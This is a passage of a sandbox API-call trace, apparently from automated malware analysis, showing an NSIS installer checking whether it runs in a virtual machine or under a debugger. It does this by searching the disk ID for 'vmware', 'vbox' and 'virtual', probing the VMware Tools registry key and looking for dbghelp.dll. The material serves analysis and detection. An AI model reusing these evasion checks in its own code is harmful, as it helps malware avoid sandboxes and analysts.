lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.938] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.938] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.938] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.938] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.938] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.938] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.938] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vmware')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vmware')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vmware')i.R0 ?c" [0157.938] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.938] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.939] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.939] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.939] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.939] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.939] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.939] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.939] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.939] lstrcpynA (in: lpString1=0x323058, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.939] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.940] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.940] lstrlenA (lpString="strstr") returned 6 [0157.940] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.940] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] lstrcpynA (in: lpString1=0x3217a0, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.940] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.940] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="vmware") returned 0x0 [0157.940] lstrcpynA (in: lpString1=0x314820, lpString2="vmware", iMaxLength=1024 | out: lpString1="vmware") returned="vmware" [0157.940] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.940] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.940] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.940] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.940] lstrlenA (lpString="0") returned 1 [0157.940] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.941] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.941] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.941] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.941] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.941] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.941] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.941] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.941] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.942] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'vbox')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'vbox')i.R0 ?c") returned="ntdll::strstr(t R1, t 'vbox')i.R0 ?c" [0157.942] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.942] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.942] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.942] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.942] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.942] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.942] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.943] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.943] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.943] lstrcpynA (in: lpString1=0x323058, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.943] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.943] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.943] lstrlenA (lpString="strstr") returned 6 [0157.943] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.943] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.943] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.944] lstrcpynA (in: lpString1=0x3217a0, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.944] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="vbox") returned 0x0 [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="vbox", iMaxLength=1024 | out: lpString1="vbox") returned="vbox" [0157.944] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.944] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.944] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.944] lstrlenA (lpString="0") returned 1 [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.944] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.944] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.944] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.944] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.944] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.945] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.945] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.945] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.945] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'virtual')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'virtual')i.R0 ?c") returned="ntdll::strstr(t R1, t 'virtual')i.R0 ?c" [0157.945] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.945] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.945] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.945] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.946] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.946] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.946] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.946] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.946] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.946] lstrcpynA (in: lpString1=0x323058, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.946] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.946] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.946] lstrlenA (lpString="strstr") returned 6 [0157.946] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.947] lstrcpynA (in: lpString1=0x3217a0, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] lstrcpynA (in: lpString1=0x314418, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] lstrcpynA (in: lpString1=0x3217a0, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.947] strstr (_Str="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", _SubStr="virtual") returned 0x0 [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="virtual", iMaxLength=1024 | out: lpString1="virtual") returned="virtual" [0157.947] lstrcpynA (in: lpString1=0x314820, lpString2="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0", iMaxLength=1024 | out: lpString1="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0") returned="ide\\diskwd5000ys________________________________rj13____\\5&37d1a386&0&0.0.0" [0157.947] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.947] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.947] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.947] lstrlenA (lpString="0") returned 1 [0157.947] lstrcpynA (in: lpString1=0x40ac18, lpString2="SOFTWARE\\VMware, Inc.\\VMware Tools", iMaxLength=1024 | out: lpString1="SOFTWARE\\VMware, Inc.\\VMware Tools") returned="SOFTWARE\\VMware, Inc.\\VMware Tools" [0157.947] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="SOFTWARE\\VMware, Inc.\\VMware Tools", ulOptions=0x0, samDesired=0x20119, phkResult=0x18f7f0 | out: phkResult=0x18f7f0*=0x0) returned 0x2 [0157.947] lstrcpynA (in: lpString1=0x40b018, lpString2="InstallPath", iMaxLength=1024 | out: lpString1="InstallPath") returned="InstallPath" [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrlenA (lpString="0") returned 1 [0157.948] lstrcpynA (in: lpString1=0x432c00, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrlenA (lpString="0") returned 1 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.948] lstrcmpiA (lpString1="0", lpString2="0") returned 0 [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrlenA (lpString="FALSE") returned 5 [0157.948] lstrcpynA (in: lpString1=0x432800, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrcpynA (in: lpString1=0x432c00, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrlenA (lpString="FALSE") returned 5 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="FALSE", iMaxLength=1024 | out: lpString1="FALSE") returned="FALSE" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="TRUE", iMaxLength=1024 | out: lpString1="TRUE") returned="TRUE" [0157.948] lstrcmpiA (lpString1="FALSE", lpString2="TRUE") returned -1 [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrlenA (lpString="") returned 0 [0157.948] lstrcpynA (in: lpString1=0x31400c, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.948] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.948] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.948] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.948] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.948] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.948] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.948] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.949] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.949] lstrcpynA (in: lpString1=0x31441c, lpString2="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0", iMaxLength=1024 | out: lpString1="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0") returned="kernel32::GetModuleHandle(t 'dbghelp.dll') i.R0" [0157.949] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.949] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.949] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.949] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.949] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.949] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.949] lstrcpyA (in: lpString1=0x3217a0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.949] lstrcpyA (in: lpString1=0x321bb0, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0157.949] lstrcpyA (in: lpString1=0x321fb0, lpString2="GetModuleHandle" | out: lpString1="GetModuleHandle") returned="GetModuleHandle" [0157.949] lstrcpynA (in: lpString1=0x323058, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] GetModuleHandleA (lpModuleName="kernel32") returned 0x75c90000 [0157.950] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandle") returned 0x0 [0157.950] lstrlenA (lpString="GetModuleHandle") returned 15 [0157.950] GetProcAddress (hModule=0x75c90000, lpProcName="GetModuleHandleA") returned 0x75ca1245 [0157.950] lstrcpynA (in: lpString1=0x3217a0, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] lstrcpynA (in: lpString1=0x314418, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.950] GetModuleHandleA (lpModuleName="dbghelp.dll") returned 0x0 [0157.950] lstrcpynA (in: lpString1=0x314418, lpString2="dbghelp.dll", iMaxLength=1024 | out: lpString1="dbghelp.dll") returned="dbghelp.dll" [0157.950] wsprintfA (in: param_1=0x314418, param_2="%d" | out: param_1="0") returned 1 [0157.950] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.950] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | 